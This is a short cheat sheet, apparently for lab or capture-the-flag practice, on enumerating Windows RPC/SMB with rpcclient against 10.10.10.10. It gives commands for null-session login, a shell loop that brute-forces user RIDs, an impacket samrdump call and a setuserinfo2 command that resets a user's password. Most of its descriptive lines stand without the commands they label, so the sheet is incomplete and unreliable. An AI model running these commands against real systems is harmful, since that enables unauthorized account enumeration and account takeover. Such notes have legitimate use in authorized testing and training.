rpcclient -U '' -N 10.10.10.10
rpcclient -U 'qu35t' 10.10.10.10
List all users.
Get information about a user.
List all groups.
Get information about a group.
Show members of a group.
List all domains.
Get information about a domain.
List all shares.
Get share information.
netsharegetinfo notes
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
Brute forcing user RIDs.
for i in $(seq 500 1100); do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; done
With an impacket script.
samrdump.py 10.10.10.10
setuserinfo2 'qu35t' 23 'NewPassw0rd!'